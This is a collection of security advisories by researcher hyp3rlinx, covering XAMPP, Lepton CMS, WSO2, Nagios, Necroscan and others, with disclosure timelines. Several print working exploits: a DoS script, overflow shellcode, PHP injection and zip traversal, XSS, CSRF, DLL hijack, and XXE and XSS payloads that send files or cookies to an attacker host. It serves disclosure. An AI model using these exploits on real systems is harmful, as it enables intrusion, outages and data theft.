XAMPP Control Panel Memory Corruption Denial Of Service
[+] Credits: John Page (hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt [+] ISR: ApparitionSec Vendor: = www.apachefriends.org Product: === XAMPP Control Panel XAMPP is a free and open source cross-platform web server solution stack package developed by Apache Friends, consisting mainly of the Apache HTTP Server, MariaDB database, and interpreters for scripts written in the PHP and Perl programming languages. Vulnerability Type: = Memory Corruption DOS CVE Reference: == N/A Vulnerability Details: = XAMPP Control Panel crashes with access violation when writing junk bytes into several different ports e.g. Tested following ports / versions: (MySQL) 3306 v3.2.2 (Tomcat) 8080 (XAMPP v3.1.0) (FileZilla) 21 (Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143. It is not that XAMPP Control Panel is listening on some port, however memory corruption and Denial Of Service does occur when you constantly write junk into, for instance, the MySQL, Tomcat, FileZilla, Mercury Mail listening ports. 1) Launch XAMPP control panel 2) Run exploit script against some ports like 3306, 79, 105 (Mercury mail) with Apache running and or Tomcat Target different services and port combinations to reproduce. Important to note is that neither MySQL or Apache itself crash, it IS the XAMPP Control Panel that crashes with Access Violation. Tested Windows SP1 POC Video: https://vimeo.com/196938261 Exploit code(s): === import socket print "XAMPP Control Panel DOS" print "Discovery: John Page (hyp3rlinx)" print "ApparitionSec" print "hyp3rlinx.altervista.org\r\n" IP = raw_input("[IP]> ") PORT = raw_input("[PORT]> ") arr=[] c=0 while 1: try: arr.append(socket.create_connection((IP,PORT))) arr[c].send("DOOM") print "Die!" c+=1 except socket.error: print "[+] Done! " raw_input() break Disclosure Timeline: === Vendor Notification: November 1, 2016 Vendor acknowledgement: November 4, 2016 Vendor released Fix : December 22, 2016 (NO public mention as of the time of this writing) December 24, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Adobe Animate <= v15.2.1.95 Memory Corruption Vulnerability
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-ANIMATE-MEMORY-CORRUPTION-VULNERABILITY.txt [+] ISR: ApparitionSec Vendor: = www.adobe.com Product(s): = Adobe Animate 15.2.1.95 and earlier versions Adobe Animate (formerly Adobe Flash Professional, Macromedia Flash, and FutureSplash Animator) is a multimedia authoring and computer animation program developed by Adobe Systems. Platforms: === Windows / Macintosh Vulnerability Type: === Critical Memory Corruption Vulnerability CVE Reference: == CVE-2016-7866 APSB16-38 Vulnerability Details: = Adobe Animate suffers from a Buffer Overflow when creating .FLA files with ActionScript Classes that use overly long Class names. This causes memory corruption leading to possible arbitrary code execution upon opening a maliciously created .Fla Flash file. Reproduction / POC: 1) Create FLA with overly long Class name in FLA Class publish properties input field. 2) Save and close 3) Reopen FLA, click edit to open the .as script file 4) "ctrl + s" to save then boom access violation Distributed: Create new ".as" ActionScript 3 (AS3) file and give it very long class name in input field then hit "Ctrl+s" to save.. you will crash IDE, next way described is ONE way how attackers can distribute malicious .FLA Abusing JSFL, The Flash JavaScript application programming interface (JavaScript API or JSAPI). 1) Create following .JSFL file fl.getDocumentDOM().save(); fl.getDocumentDOM().testMovie(); 2) Create a MovieClip stored in FLA library with a very long class name that extends MovieClip and export it for ActionScript etc... 3) Drag the MovieClip to the stage 4) Bundle FLA/JSFL file, make avail for download as example on how to use JSFL to call save() / publish() functions. User opens .FLA, runs harmless looking JSFL code then BOOM! Reference: https://helpx.adobe.com/security/products/animate/apsb16-38.html Disclosure Timeline: = Vendor Notification: May 28, 2016 December 13, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Puppet Enterprise Web Interface Authentication Redirect
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PUPPET-AUTHENTICATION-REDIRECT.txt [+] ISR: ApparitionSec Vendor: == www.puppet.com Product: Puppet Enterprise Web Interface Version < 2016.4.0 Puppet Enterprise is the leading platform for automatically delivering, operating and securing your infrastructure. Vulnerability Type: = Authentication Redirect CVE Reference: == CVE-2016-5715 Vulnerability Details: = When logging into Puppet Enterprise Web Interface, users can be redirected to attacker controlled servers, if a user logs in using an attacker supplied authentication link it can result in credential theft etc. Fixed in version 2016.4.0 References: https://puppet.com/security/cve/cve-2016-5715 Exploit code(s): === Bypass character filters you need to pass double forward slashes "//" or the redirect will fail. https://victim-puppet-server/auth/login?redirect=//attacker-server Disclosure Timeline: == Vendor Notification: August 23, 2016 Vendor Acknowledgement: August 23, 2016 Vendor Releases Fix: in version 2016.4.0 October 17, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Necroscan <= v0.9.1 Buffer Overflow
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NECROSCAN-BUFFER-OVERFLOW.txt [+] ISR: ApparitionSec Vendor: === nscan.hypermart.net Product: == NECROSOFT NScan version <= v0.9.1 ver 0.666 build 13 circa 1999 NScan is one of the most fast and flexible portscanners for Windows. It is specially designed for scanning large networks and gathering related network/host information. It supports remote monitoring, usage of host and port lists, option profiles, speed and accuracy tuning, etc. It also contains a traceroute, dig and whois, which work together with scanner. Vulnerability Type: Buffer Overflow Vulnerability Details: = dig.exe is a component of Necroscan 'nscan.exe' that performs DNS lookups, this component has a trivial buffer overflow vulnerability. 1,001 bytes direct EIP overwrite our shellcode will be sitting at ESP register. Important we need \x2E\x2E in the shellcode! WinExec(calc.exe) as once it is injected it gets converted to an unusable character and will fail to execute. However, we can bypass this by double padding our shellcode \x2E\x2E instead of a single \x2E now it will Execute! payload="A"*997+"" <= EIP is here 1) use mona or findjmp.exe to get suitable JMP ESP register 2) run python script below to generate exploit payload 3) paste payload into DNS lookup 'Target' input field 4) Click 'TCP lookup' button 5) BOOM see calc.exe run! Stack dump... EAX 0021 ECX 2D68 EDX 01C9E8B8 EBX 756EFA00 kernel32.756EFA00 ESP 036BFEE0 ASCII "calc" EBP 756C2C51 kernel32.WinExec ESI 002D4A78 EDI 756EFA28 kernel32.756EFA28 EIP 036BFF58 C 0 ES 002B 32bit 0() P 1 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 1 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFD7000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_NO_MORE_FILES (0012) EFL 0246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty g ST1 empty g ST2 empty g ST3 empty g ST4 empty g ST5 empty g ST6 empty g ST7 empty g 3 2 1 0 E S P U O Z D I FST Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1 Exploit code(s): === import struct #Author: hyp3rlinx #ISR: ApparitionSec #Site: hyp3rlinx.altervista.org # #Necroscan nscan.exe Local Buffer Overflow POC #dig.exe is a component of Necroscan that does DNS lookups #this component has a trivial buffer overflow vulnerability. #payload="A"*1001 #EIP is here #paste generated exploit into DNS lookup 'Target' input field #Click 'TCP lookup' button #BOOM! #Important need .. \x2E\x2E in the shellcode! (calc.exe) #Tested successfully Windows 7 SP1 #No suitable JMP register in the vulnerable program, they contain null bytes, have use !mona jmp -r esp #plugin or findjmp.exe. rp=struct.pack("<L", 0x75658BD5) #JMP ESP kernel32 # Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x2E\x65\x78\x65" #<=== \x2E\x2E (Deal with "." character problem) "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") payload="A"*997+rp+"\x90"*10+sc file=open("NECRO", "w") file.write(payload) file.close() print '=== Exploit payload created! ===' print '=== HYP3RLINX | APPARITIONsec ===' Exploitation Technique: === Local Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Lepton CMS PHP Code Injection
[+] Credits: John Page (HYP3RLINX) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt [+] ISR: ApparitionSec Vendor: == www.lepton-cms.org Product: = Lepton CMS 2.2.0 / 2.2.1 (update) LEPTON is an easy-to-use but full customizable Content Management System (CMS). Vulnerability Type: === PHP Code Injection CVE Reference: == N/A Vulnerability Details: = No input validation check is done on the "Database User" input field when entering Lepton CMS setup information using the Install Wizard. Therefore, a malicious user can input whatever they want in "config.php", this can allow for PHP Remote Command Execution on the Host system. e.g. In the database username field, single quote to close "DB_USERNAME" value then open our own PHP tags. ');?> Now in "config.php" the Database username becomes ===> define('DB_USERNAME', '');?>'); A security check attempt is made by Lepton to disallow making multiple HTTP requests for "config.php". On line 3 of "config.php" file we find. /// if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted to load \'config.php\' twice!! Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); } /// However, the security check is placed on line 3 way before "LEPTON_PATH" has been defined allowing complete bypass of that access control check. Now we can inject our own PHP code into the config allowing Remote Command Execution or Local/Remote File Includes etc... Next, make HTTP GET request to "http://victim-server/upload/install/save.php; again and code execution will be achieved or request "config.php" directly as the security check made on line 3 of "config.php" to prevent multiple HTTP requests to "config.php" does NOT work anyhow. In situations where an installation script is provided as part of a some default image often available as a convenience by hosting providers, this can be used to gain code execution on the target system and bypass whatever security access controls/restrictions etc. References: http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php Exploit code(s): === 1) At step 4 of Leptons Install Wizard, enter ');?> for Database User name, then fill in rest of fields 2) Click go to step 5 and fill in required fields, then click "Install LEPTON" 3) Make HTTP GET request to: http://localhost/LEPTON_stable_2.2.0/upload/install/save.php OR http://localhost/LEPTON_stable_2.2.0/upload/config.php BOOM pop calc.exe... Disclosure Timeline: === Attempted Vendor Notification: June 11, 2016 (No replies) Vendor Notification on July 12, 2016 ( thanks Henri Salo ) Vendor Acknowledgement: July 13, 2016 Vendor fixes: July 14, 2016 Vendor release version 2.2.2 : August 12, 2016 August 15, 2016 : Public Disclosure Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Lepton CMS Archive Directory Traversal
[+] Credits: John Page (HYP3RLINX) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt [+] ISR: ApparitionSec Vendor: == www.lepton-cms.org Product: = Lepton CMS 2.2.0 / 2.2.1 (update) LEPTON is an easy-to-use but full customizable Content Management System (CMS). Vulnerability Type: Archive Directory Traversal CVE Reference: == N/A Vulnerability Details: = Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can then be used to execute remote commands on the affected host system. e.g. We get error message as below. under "Add Ons" tab Install Module. Invalid LEPTON installation file. Please check the *.zip format.[1] Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name. Exploit code(s): === ";exit();} $file_name=$argv[1]; $zip = new ZipArchive(); $res = $zip->open("$file_name.zip", ZipArchive::CREATE); $zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", ''); $zip->close(); echo "Malicious archive created...\r\n"; echo "= hyp3rlinx "; ?> Disclosure Timeline: === Attempted Vendor Notification: June 11, 2016 (No replies) Vendor Notification on July 12, 2016 ( thanks Henri Salo ) Vendor Acknowledgement: July 13, 2016 Vendor fixes: July 14, 2016 Vendor release version 2.2.2 : August 12, 2016 August 15, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
WSO2-CARBON v4.4.5 CSRF / DOS
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt [+] ISR: ApparitionSec Vendor: www.wso2.com Product: == Ws02Carbon v4.4.5 WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario. Vulnerability Type: = Cross Site Request Forgery / DOS CVE Reference: == CVE-2016-4315 Vulnerability Details: = The attack involves tricking a privileged user to initiate a request by clicking a malicious link or visiting an evil webpage to shutdown WSO2 Servers. References: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101 The getSafeText() Function and conditional logic below processes the "action" parameter with no check for inbound CSRF attacks. String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE); String action = CharacterEncoder.getSafeText(request.getParameter("action")); ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session); try { if ("restart".equals(action)) { client.restart(); } else if ("restartGracefully".equals(action)) { client.restartGracefully(); } else if ("shutdown".equals(action)) { client.shutdown(); } else if ("shutdownGracefully".equals(action)) { client.shutdownGracefully(); } } catch (Exception e) { response.sendError(500, e.getMessage()); return; } Exploit code(s): === Shutdown the Carbon server https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown;>Shut it down! Disclosure Timeline: == Vendor Notification: May 6, 2016 Vendor Acknowledgement: May 6, 2016 Vendor Fix / Customer Alerts: June 30, 2016 August 12, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
WSO2 CARBON v4.4.5 PERSISTENT XSS COOKIE THEFT
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt [+] ISR: ApparitionSec Vendor: = www.wso2.com Product: == Ws02Carbon v4.4.5 WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario. Vulnerability Type: === Persistent / Reflected Cross Site Scripting (XSS) - Cookie Disclosure CVE Reference: == CVE-2016-4316 Vulnerability Details: = WSo2 Carbon has multiple XSS vectors allowing attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy, stealing session cookies and used as a platform for further attacks on the system. Exploit code(s) === Persistent XSS: GET Request https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS="/>alert(document.cookie) Request two is POST /carbon/identity-mgt/challenges-mgt-finish.jsp setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E==City+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=City+where+you+were+born+%3F=Father%27s+middle+name+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Father%27s+middle+name+%3F=Name+of+your+first+pet+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+your+first+pet+%3F=Favorite+sport+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Favorite+sport+%3F=Favorite+food+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+food+%3F=Favorite+vacation+location+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+vacation+location+%3F=Model+of+your+first+car+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Model+of+your+first+car+% 3F=Name+of+the+hospital+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+the+hospital+where+you+were+born+%3F=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E=XSS Then XSS payload will be listed here in below URL: https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1=identity_security_questions_menu Finally when victim clicks to "Delete" entry on the page the XSS is executed. Here is stored payload from the HTML source Delete /// Reflected XSS XSS #1 https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=9763=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E XSS #2 https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=HELL XSS #3 https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=true XSS #4 https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E=victim-server= XSS #5 https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true=in=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E XSS #6 https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?=WSO2_CARBON_DB=com.mysql.jdbc.Driver=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E=root=RDBMS=RDBMS=default=undefined=undefined=undefined=false=true= Disclosure Timeline: === Vendor Notification: May 6, 2016 Vendor Acknowledgement: May 6, 2016 Vendor Fix / Customer Alerts: June 30, 2016 August 12, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due c
WSO2 IDENTITY-SERVER v5.1.0 XML External-Entity
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt [+] ISR: ApparitionSec Vendor: = www.wso2.com Product: Wso2 Identity Server v5.1.0 As the industryÂ’s first enterprise identity bus (EIB), WSO2 Identity Server is the central backbone that connects and manages multiple identities across applications, APIs, the cloud, mobile, and Internet of Things devices, regardless of the standards on which they are based. The multi-tenant WSO2 Identity Server can be deployed directly on servers or in the cloud, and has the ability to propagate identities across geographical and enterprise borders in a connected business environment. Vulnerability Type: XML External Entity / CSRF CVE Reference(s): === CVE-2016-4312 (XXE) CVE-2016-4311 (CSRF) Vulnerability Details: = WSO2IS XML parser is vulnerable to XXE attack in the XACML flow, this can be exploited when XML input containing a reference to an external entity is processed by a weakly configured XML parser. The attack leads to the disclosure and exfiltration of confidential data and arbitrary system files, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located (localhost), and other system impacts. The exploit can be carried out locally by an internal malicious user or remote via CSRF if an authenticated user clicks an attacker supplied link or visits a evil webpage. In case of WSO2IS system files can be read / exfiltrated to the remote attackers server for safe keeping -_- References: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096 Exploit code(s): === XXE POC, exfiltrate the victims Windows hosts file to our remote server. 1) Form for the XXE POST request. https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false; method="post"> http://attackserver:8080/payload.dtd;> %dtd;]> document.getElementById('XXE').submit() 2) DTD file on attacker server. http://attackserver:8080?%file;'>"> %all; 3) On attack server create listener for the victims HTTP request. python -m SimpleHTTPServer 8080 Disclosure Timeline: Vendor Notification: May 6, 2016 Vendor Acknowledgement: May 6, 2016 Vendor Fix / Customer Alerts: June 30, 2016 August 12, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Nagios NA v2.2.1 XSS
[+] Credits: John Page -HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-XSS.txt [+] ISR: ApparitionSec Vendor: === www.nagios.com Product: == Nagios Network Analyzer v2.2.1 Netflow Analysis, Monitoring, and Bandwidth Utilization Software Network Analyzer provides an in-depth look at all network traffic sources and potential security threats allowing system admins to quickly gather high-level information regarding the health of the network as well as highly granular data for complete and thorough network analysis. Vulnerability Type: == Cross Site Scripting (XSS) CVE Reference: == N/A Vulnerability Details: = Nagios NA has XSS vector which enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. The application seems to filter injecting "document.cookie", however we can bypass this by using document['cookie'] in its place. Exploit code(s): === Steal Session Cookie http://victim-server/nagiosna/index.php/sources/queries/1?q[begindate]=-24+hours[enddate]=-1+second[aggregate_csv]=[qid]=%27%27;window.open(%22http://attacker-server/c.php?c=%22%2bdocument[%27cookie%27])// Disclosure Timeline: == Vendor Notification: July 20, 2016 Vendor Acknowledgement: July 21, 2016 Vendor Fix / Release: August 1, 2016 August 8, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
AirSnort v0.2.7 Stack Corruption DOS
[+] Credits: Hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AIRSNORT-STACK-CORRUPTION-DOS.txt [+] ISR: ApparitionSec Vendor: == sourceforge.net/projects/airsnort/ Product: === AirSnort v0.2.7 AirSnort is a wireless LAN (WLAN) tool which cracks encryption keys on 802.11b WEP networks. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Vulnerability Type: === Stack Corruption DOS Vulnerability Details: = When open / load a corrupt 'crackfile' with bunch of 'AA's... airsnort crashes and stack is corrupted. Under File / Load "Crack" File... open corrupt crackfile with bunch of 'A' chars then BOOM... Tested successfully on Linux OS. GDB reg dump Program received signal SIGSEGV, Segmentation fault. 0xb72780e5 in __mempcpy_ia32 () from /lib/libc.so.6 (gdb) info r eax0x4141413b 1094795579 ecx0x3e3995 edx0x829e9d8136964568 ebx0xb73c1000 -1220800512 esp0xbfffe1dc 0xbfffe1dc ebp0x0 0x0 esi0xb67cf00a -1233326070 edi0x0 0 eip0xb72780e5 0xb72780e5 <__mempcpy_ia32+21> eflags 0x210203 [ CF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Any Video Converter DLL Hijack
[+] Credits: HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ANY-VIDEO-CONVERTER-DLL-HIJACK.txt [+] ISR: ApparitionSec Vendor: === www.any-video-converter.com Product: AVCSoft / Any Video Converter v5.9.5 AVCFree.exe is a Video downloader and converter. Vulnerability Type: DLL Hijack CVE Reference: == N/A Vulnerability Details: = Vuln DLL: libx265_main10.dll AVCFree.exe will search for an load any DLL named "libx265_main10.dll". If an attacker can place the DLL in a location where victim opens a file in AVCFree it will load and run the attackers DLL and code. In testing I notice if the file type is associated with AVCFree.exe as default program to open with then double clicking the file will load and execute the vuln DLL. If file type is not associated with AVCFree then right clicking and choosing to open with AVCFree will do the same. Right click or Double click and open in AVCFree.exe following file types then BOOM. .mp4, .mp3, .mpg, mpeg, .iso, .divx, .wav, .flv, .avs, .mov and probably more... Exploit code(s): === 1) Save and compile below C code as 'libx265_main10.c' to create vuln DLL 2) Place on remote share or other directory like "downloads" 3) Right click or Double Click an .mpg file or any of extensions listed above to open with AVCFree.exe then BOOM! #include //gcc -c libx265_main10.c //gcc -shared -o libx265_main10.dll libx265_main10.o BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Arbitrary Code Exec", "PWNED!", MB_OK); break; } return 0; } Disclosure Timeline: === Vendor Notification: No Replies August 8, 2016 : Public Disclosure Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Nagios Network Analyzer v2.2.1 Multiple CSRF
